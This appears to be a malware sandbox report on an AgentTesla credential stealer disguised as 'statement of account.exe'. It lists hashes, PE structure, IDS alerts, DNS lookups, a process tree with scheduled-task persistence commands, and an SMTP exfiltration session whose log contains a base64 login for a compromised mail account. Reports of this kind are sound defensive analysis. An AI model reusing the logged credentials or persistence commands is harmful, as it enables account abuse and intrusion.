                                        SHA-512:33681149A92FA03E80ED0E1C38DAC6672785DD058D40B74DAA75F649D8B7B78B315755FE81854919579A4FD9C1043AA52BCC5A46A3CCC954C1E6D3C16EA9A5CB
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 69%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.c..............P.................. ........@.. .......................@............@.................................m...O............................ ..........T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........p.......D...X...hD............................................( ...*&..(!....*.s"........s#........s$........s%........s&........*...0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*&..(,....*...0..<........~.....(-.....,!r...p.....(....o/...s0............~.....+..*.0...........~.....+..*".......*.0...........(....r=..p~....o1....+..*...0..<........~.....(-.....,!rM..p.....(.
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):777216
                                        Entropy (8bit):7.5421915933868116
                                        Encrypted:false
                                        SSDEEP:12288:nKdsyGFr5cE8LHW4RelEpb8bOmsX4K1hOCcTVURwq05Sgk2/SEdRMA/LyzIPPPuA:6ZvLrRGWb8OH1hO1UH0A49/LkInstA
                                        MD5:808F76963A9F42AD7310A3B7D65C7983
                                        SHA1:F748A841B2EC35BC40ED0BACBE953C28BC11A8A6
                                        SHA-256:9F04B0B059E331845F8C3F9F4F83C785B07766529BB24DBBFB02FBAB9E414938
                                        SHA-512:33681149A92FA03E80ED0E1C38DAC6672785DD058D40B74DAA75F649D8B7B78B315755FE81854919579A4FD9C1043AA52BCC5A46A3CCC954C1E6D3C16EA9A5CB
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 69%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.c..............P.................. ........@.. .......................@............@.................................m...O............................ ..........T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........p.......D...X...hD............................................( ...*&..(!....*.s"........s#........s$........s%........s&........*...0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*&..(,....*...0..<........~.....(-.....,!r...p.....(....o/...s0............~.....+..*.0...........~.....+..*".......*.0...........(....r=..p~....o1....+..*...0..<........~.....(-.....,!rM..p.....(.
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):835
                                        Entropy (8bit):4.694294591169137
                                        Encrypted:false
                                        SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                        MD5:6EB47C1CF858E25486E42440074917F2
                                        SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                        SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                        SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                        Malicious:true
                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.5421915933868116
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:statement of account.exe
                                        File size:777216
                                        MD5:808f76963a9f42ad7310a3b7d65c7983
                                        SHA1:f748a841b2ec35bc40ed0bacbe953c28bc11a8a6
                                        SHA256:9f04b0b059e331845f8c3f9f4f83c785b07766529bb24dbbfb02fbab9e414938
                                        SHA512:33681149a92fa03e80ed0e1c38dac6672785dd058d40b74daa75f649d8b7b78b315755fe81854919579a4fd9c1043aa52bcc5a46a3ccc954c1e6d3c16ea9a5cb
                                        SSDEEP:12288:nKdsyGFr5cE8LHW4RelEpb8bOmsX4K1hOCcTVURwq05Sgk2/SEdRMA/LyzIPPPuA:6ZvLrRGWb8OH1hO1UH0A49/LkInstA
                                        TLSH:6DF47B9232B18673F49F4269142471CC2EBCB107B3D5E21B6F777A9152019BFF6A8E12
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.c..............P.................. ........@.. .......................@............@................................
                                        Icon Hash:00828e8e8686b000
                                        Entrypoint:0x4bf0c2
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6385659B [Tue Nov 29 01:51:23 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                         Name                                  Virtual Address  Virtual Size  Is in Section
                                         IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                         IMAGE_DIRECTORY_ENTRY_IMPORT          0xbf06d          0x4f          .text
                                         IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc0000          0x5d4         .rsrc
                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                         IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                         IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc2000          0xc           .reloc
                                         IMAGE_DIRECTORY_ENTRY_DEBUG           0xbcac0          0x54          .text
                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                         IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                         IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                         IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                         Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                         .text   0x2000           0xbd0c8       0xbd200   False     0.7888043208856577  data       7.547588668070066    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                         .rsrc   0xc0000          0x5d4         0x600     False     0.4283854166666667  data       4.1649171913963645   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         .reloc  0xc2000          0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                         Name         RVA      Size   Type                                                                              Language  Country
                                         RT_VERSION   0xc0090  0x344  data
                                         RT_MANIFEST  0xc03e4  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                         DLL          Import
                                         mscoree.dll  _CorExeMain
                                         Timestamp                 Protocol  SID      Message                                                            Source Port  Dest Port  Source IP    Dest IP
                                         11/29/22-15:00:43.881102  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP                                49698        587        192.168.2.3  27.54.86.236
                                         11/29/22-15:01:36.844935  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil                            49699        587        192.168.2.3  27.54.86.236
                                         11/29/22-15:02:05.481443  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP                                49700        587        192.168.2.3  27.54.86.236
                                         11/29/22-15:01:36.844935  TCP       2840032  ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2  49699        587        192.168.2.3  27.54.86.236
                                         11/29/22-15:01:36.844935  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP                                49699        587        192.168.2.3  27.54.86.236
                                         11/29/22-15:00:43.881210  TCP       2840032  ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2  49698        587        192.168.2.3  27.54.86.236
                                         11/29/22-15:02:05.481443  TCP       2840032  ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2  49700        587        192.168.2.3  27.54.86.236
                                         11/29/22-15:00:43.881210  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil                            49698        587        192.168.2.3  27.54.86.236
                                         11/29/22-15:02:05.481443  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil                            49700        587        192.168.2.3  27.54.86.236
UDP Packets

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Nov 29, 2022 15:00:41.584855080 CET | 49977 | 53 | 192.168.2.3 | 8.8.8.8 |
| Nov 29, 2022 15:00:41.644109011 CET | 53 | 49977 | 8.8.8.8 | 192.168.2.3 |
| Nov 29, 2022 15:01:34.988333941 CET | 57840 | 53 | 192.168.2.3 | 8.8.8.8 |
| Nov 29, 2022 15:01:35.008188009 CET | 53 | 57840 | 8.8.8.8 | 192.168.2.3 |
| Nov 29, 2022 15:02:03.632549047 CET | 57990 | 53 | 192.168.2.3 | 8.8.8.8 |
| Nov 29, 2022 15:02:03.662837029 CET | 53 | 57990 | 8.8.8.8 | 192.168.2.3 |
DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Nov 29, 2022 15:00:41.584855080 CET | 192.168.2.3 | 8.8.8.8 | 0x36e8 | Standard query (0) | mail.clipjoint.co.nz | A (IP address) | IN (0x0001) | false |
| Nov 29, 2022 15:01:34.988333941 CET | 192.168.2.3 | 8.8.8.8 | 0xa70c | Standard query (0) | mail.clipjoint.co.nz | A (IP address) | IN (0x0001) | false |
| Nov 29, 2022 15:02:03.632549047 CET | 192.168.2.3 | 8.8.8.8 | 0x52b4 | Standard query (0) | mail.clipjoint.co.nz | A (IP address) | IN (0x0001) | false |
DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Nov 29, 2022 15:00:41.644109011 CET | 8.8.8.8 | 192.168.2.3 | 0x36e8 | No error (0) | mail.clipjoint.co.nz | | 27.54.86.236 | A (IP address) | IN (0x0001) | false |
| Nov 29, 2022 15:01:35.008188009 CET | 8.8.8.8 | 192.168.2.3 | 0xa70c | No error (0) | mail.clipjoint.co.nz | | 27.54.86.236 | A (IP address) | IN (0x0001) | false |
| Nov 29, 2022 15:02:03.662837029 CET | 8.8.8.8 | 192.168.2.3 | 0x52b4 | No error (0) | mail.clipjoint.co.nz | | 27.54.86.236 | A (IP address) | IN (0x0001) | false |
SMTP Packets

| Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
|---|---|---|---|---|---|
| Nov 29, 2022 15:00:42.532310009 CET | 587 | 49698 | 27.54.86.236 | 192.168.2.3 | 220-cp-wc27.per01.ds.network ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 22:00:42 +0800 |
| | | | | | 220-We do not authorize the use of this system to transport unsolicited, |
| | | | | | 220 and/or bulk e-mail. |
| Nov 29, 2022 15:00:42.532679081 CET | 49698 | 587 | 192.168.2.3 | 27.54.86.236 | EHLO 496536 |
| Nov 29, 2022 15:00:42.765861034 CET | 587 | 49698 | 27.54.86.236 | 192.168.2.3 | 250-cp-wc27.per01.ds.network Hello 496536 [102.129.143.49] |
| | | | | | 250-SIZE 52428800 |
| | | | | | 250-8BITMIME |
| | | | | | 250-PIPELINING |
| | | | | | 250-PIPE_CONNECT |
| | | | | | 250-AUTH PLAIN LOGIN |
| | | | | | 250-STARTTLS |
| | | | | | 250 HELP |
| Nov 29, 2022 15:00:42.767602921 CET | 49698 | 587 | 192.168.2.3 | 27.54.86.236 | AUTH login Y2xpcGpvaW50QGNsaXBqb2ludC5jby5ueg== |
| Nov 29, 2022 15:00:42.986309052 CET | 587 | 49698 | 27.54.86.236 | 192.168.2.3 | 334 UGFzc3dvcmQ6 |
| Nov 29, 2022 15:00:43.218561888 CET | 587 | 49698 | 27.54.86.236 | 192.168.2.3 | 235 Authentication succeeded |
| Nov 29, 2022 15:00:43.221143961 CET | 49698 | 587 | 192.168.2.3 | 27.54.86.236 | MAIL FROM:<clipjoint@clipjoint.co.nz> |
| Nov 29, 2022 15:00:43.439682007 CET | 587 | 49698 | 27.54.86.236 | 192.168.2.3 | 250 OK |
| Nov 29, 2022 15:00:43.440382004 CET | 49698 | 587 | 192.168.2.3 | 27.54.86.236 | RCPT TO:<geortiok4@gmail.com> |
| Nov 29, 2022 15:00:43.661010981 CET | 587 | 49698 | 27.54.86.236 | 192.168.2.3 | 250 Accepted |
| Nov 29, 2022 15:00:43.661220074 CET | 49698 | 587 | 192.168.2.3 | 27.54.86.236 | DATA |
| Nov 29, 2022 15:00:43.879849911 CET | 587 | 49698 | 27.54.86.236 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself |
| Nov 29, 2022 15:00:43.882033110 CET | 49698 | 587 | 192.168.2.3 | 27.54.86.236 | . |
| Nov 29, 2022 15:00:44.133389950 CET | 587 | 49698 | 27.54.86.236 | 192.168.2.3 | 250 OK id=1p01AB-0002hr-Ol |
| Nov 29, 2022 15:01:35.489814043 CET | 587 | 49699 | 27.54.86.236 | 192.168.2.3 | 220-cp-wc27.per01.ds.network ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 22:01:35 +0800 |
| | | | | | 220-We do not authorize the use of this system to transport unsolicited, |
| | | | | | 220 and/or bulk e-mail. |
| Nov 29, 2022 15:01:35.490119934 CET | 49699 | 587 | 192.168.2.3 | 27.54.86.236 | EHLO 496536 |
| Nov 29, 2022 15:01:35.709023952 CET | 587 | 49699 | 27.54.86.236 | 192.168.2.3 | 250-cp-wc27.per01.ds.network Hello 496536 [102.129.143.49] |
| | | | | | 250-SIZE 52428800 |
| | | | | | 250-8BITMIME |
| | | | | | 250-PIPELINING |
| | | | | | 250-PIPE_CONNECT |
| | | | | | 250-AUTH PLAIN LOGIN |
| | | | | | 250-STARTTLS |
| | | | | | 250 HELP |
| Nov 29, 2022 15:01:35.709719896 CET | 49699 | 587 | 192.168.2.3 | 27.54.86.236 | AUTH login Y2xpcGpvaW50QGNsaXBqb2ludC5jby5ueg== |
| Nov 29, 2022 15:01:35.928637028 CET | 587 | 49699 | 27.54.86.236 | 192.168.2.3 | 334 UGFzc3dvcmQ6 |
| Nov 29, 2022 15:01:36.173568964 CET | 587 | 49699 | 27.54.86.236 | 192.168.2.3 | 235 Authentication succeeded |
| Nov 29, 2022 15:01:36.173923969 CET | 49699 | 587 | 192.168.2.3 | 27.54.86.236 | MAIL FROM:<clipjoint@clipjoint.co.nz> |
| Nov 29, 2022 15:01:36.404695034 CET | 587 | 49699 | 27.54.86.236 | 192.168.2.3 | 250 OK |
| Nov 29, 2022 15:01:36.404953957 CET | 49699 | 587 | 192.168.2.3 | 27.54.86.236 | RCPT TO:<geortiok4@gmail.com> |
| Nov 29, 2022 15:01:36.623428106 CET | 587 | 49699 | 27.54.86.236 | 192.168.2.3 | 250 Accepted |
| Nov 29, 2022 15:01:36.623859882 CET | 49699 | 587 | 192.168.2.3 | 27.54.86.236 | DATA |
| Nov 29, 2022 15:01:36.844043016 CET | 587 | 49699 | 27.54.86.236 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself |
| Nov 29, 2022 15:01:36.845040083 CET | 49699 | 587 | 192.168.2.3 | 27.54.86.236 | . |
| Nov 29, 2022 15:01:37.091022015 CET | 587 | 49699 | 27.54.86.236 | 192.168.2.3 | 250 OK id=1p01B2-0003Ke-Nc |
| Nov 29, 2022 15:02:04.134960890 CET | 587 | 49700 | 27.54.86.236 | 192.168.2.3 | 220-cp-wc27.per01.ds.network ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 22:02:04 +0800 |
| | | | | | 220-We do not authorize the use of this system to transport unsolicited, |
| | | | | | 220 and/or bulk e-mail. |
| Nov 29, 2022 15:02:04.135234118 CET | 49700 | 587 | 192.168.2.3 | 27.54.86.236 | EHLO 496536 |
| Nov 29, 2022 15:02:04.362472057 CET | 587 | 49700 | 27.54.86.236 | 192.168.2.3 | 250-cp-wc27.per01.ds.network Hello 496536 [102.129.143.49] |
| | | | | | 250-SIZE 52428800 |
| | | | | | 250-8BITMIME |
| | | | | | 250-PIPELINING |
| | | | | | 250-PIPE_CONNECT |
| | | | | | 250-AUTH PLAIN LOGIN |
| | | | | | 250-STARTTLS |
| | | | | | 250 HELP |
| Nov 29, 2022 15:02:04.363462925 CET | 49700 | 587 | 192.168.2.3 | 27.54.86.236 | AUTH login Y2xpcGpvaW50QGNsaXBqb2ludC5jby5ueg== |
| Nov 29, 2022 15:02:04.584319115 CET | 587 | 49700 | 27.54.86.236 | 192.168.2.3 | 334 UGFzc3dvcmQ6 |
| Nov 29, 2022 15:02:04.818763018 CET | 587 | 49700 | 27.54.86.236 | 192.168.2.3 | 235 Authentication succeeded |
| Nov 29, 2022 15:02:04.819016933 CET | 49700 | 587 | 192.168.2.3 | 27.54.86.236 | MAIL FROM:<clipjoint@clipjoint.co.nz> |
| Nov 29, 2022 15:02:05.038481951 CET | 587 | 49700 | 27.54.86.236 | 192.168.2.3 | 250 OK |
| Nov 29, 2022 15:02:05.043325901 CET | 49700 | 587 | 192.168.2.3 | 27.54.86.236 | RCPT TO:<geortiok4@gmail.com> |
| Nov 29, 2022 15:02:05.261754990 CET | 587 | 49700 | 27.54.86.236 | 192.168.2.3 | 250 Accepted |
| Nov 29, 2022 15:02:05.261979103 CET | 49700 | 587 | 192.168.2.3 | 27.54.86.236 | DATA |
| Nov 29, 2022 15:02:05.480839968 CET | 587 | 49700 | 27.54.86.236 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself |
| Nov 29, 2022 15:02:05.481442928 CET | 49700 | 587 | 192.168.2.3 | 27.54.86.236 | . |
| Nov 29, 2022 15:02:06.095102072 CET | 49700 | 587 | 192.168.2.3 | 27.54.86.236 | . |
| Nov 29, 2022 15:02:06.363890886 CET | 587 | 49700 | 27.54.86.236 | 192.168.2.3 | 250 OK id=1p01BV-0003na-Bt |
| Nov 29, 2022 15:02:21.487787008 CET | 49698 | 587 | 192.168.2.3 | 27.54.86.236 | QUIT |
| Nov 29, 2022 15:02:21.910847902 CET | 587 | 49698 | 27.54.86.236 | 192.168.2.3 | 221 cp-wc27.per01.ds.network closing connection |


Target ID: 0
Start time: 15:00:00
Start date: 29/11/2022
Path: C:\Users\user\Desktop\statement of account.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\statement of account.exe
Imagebase: 0x7c0000
File size: 777216 bytes
MD5 hash: 808F76963A9F42AD7310A3B7D65C7983
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: low

Target ID: 1
Start time: 15:00:12
Start date: 29/11/2022
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp
Imagebase: 0x310000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 15:00:13
Start date: 29/11/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 3
Start time: 15:00:13
Start date: 29/11/2022
Path: C:\Users\user\Desktop\statement of account.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0xbd0000
File size: 777216 bytes
MD5 hash: 808F76963A9F42AD7310A3B7D65C7983
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 4
Start time: 15:00:15
Start date: 29/11/2022
Path: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
Imagebase: 0x2f0000
File size: 777216 bytes
MD5 hash: 808F76963A9F42AD7310A3B7D65C7983
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 69%, ReversingLabs
Reputation: low

Target ID: 14
Start time: 15:00:34
Start date: 29/11/2022
Path: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe"
Imagebase: 0xa00000
File size: 777216 bytes
MD5 hash: 808F76963A9F42AD7310A3B7D65C7983
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 69%, ReversingLabs
Reputation: low

Target ID: 15
Start time: 15:00:45
Start date: 29/11/2022
Path: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe"
Imagebase: 0x240000
File size: 777216 bytes
MD5 hash: 808F76963A9F42AD7310A3B7D65C7983
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: low

Target ID: 16
Start time: 15:00:57
Start date: 29/11/2022
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp26F5.tmp
Imagebase: 0x310000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Target ID: 17
Start time: 15:00:57
Start date: 29/11/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Target ID: 18
Start time: 15:00:58
Start date: 29/11/2022
Path: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
Wow64 process (32bit): false
Commandline: {path}
Imagebase: 0x180000
File size: 777216 bytes
MD5 hash: 808F76963A9F42AD7310A3B7D65C7983
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low

Target ID: 19
Start time: 15:00:59
Start date: 29/11/2022
Path: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0xd10000
File size: 777216 bytes
MD5 hash: 808F76963A9F42AD7310A3B7D65C7983
Has elevated privileges: false
Has administrator privileges: false
